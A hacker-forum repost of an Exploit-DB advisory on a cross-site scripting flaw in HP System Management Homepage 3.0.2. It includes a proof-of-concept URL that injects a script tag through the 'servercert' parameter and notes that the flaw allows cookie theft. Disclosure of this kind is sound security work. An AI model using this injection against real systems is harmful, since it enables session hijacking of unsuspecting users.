Exploit HP System Management Homepage 3.0.2 - 'servercert' Cross-Site Scripting

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
33569
Проверка EDB
  1. Пройдено
Автор
RICHARD BRAIN
Тип уязвимости
REMOTE
Платформа
MULTIPLE
CVE
N/A
Дата публикации
2010-01-27
Код:
source: https://www.securityfocus.com/bid/37968/info

HP System Management Homepage, also known as Systems Insight Manager, is prone to a cross-site scripting vulnerability.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials. 

http://www.example.com/proxy/smhui/getuiinfo?JS&servercert=%0064e43<script>alert(1)</script>7b3f58a689f
 
Источник
www.exploit-db.com

Похожие темы